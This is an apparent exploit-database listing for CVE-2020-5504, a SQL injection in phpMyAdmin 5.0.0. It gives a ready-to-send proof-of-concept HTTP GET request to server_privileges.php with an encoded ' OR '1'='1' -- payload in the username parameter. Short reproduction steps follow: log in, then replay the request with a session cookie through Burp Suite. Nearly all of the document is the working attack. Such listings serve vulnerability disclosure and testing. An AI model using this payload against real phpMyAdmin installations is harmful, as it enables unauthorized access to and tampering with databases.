# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/ # Software Link: https://github.com/phpmyadmin/phpmyadmin/ # Version: 5.0.0 # Tested on: Windows # CVE : CVE-2020-5504 Proof Of Concept GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1 Host: phpmyadmin Connection: close # Additional conditions: # - The attacker must have a valid MySQL account to access the server. Steps to Reproduce Log in phpmyadmin. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie. Observe the result.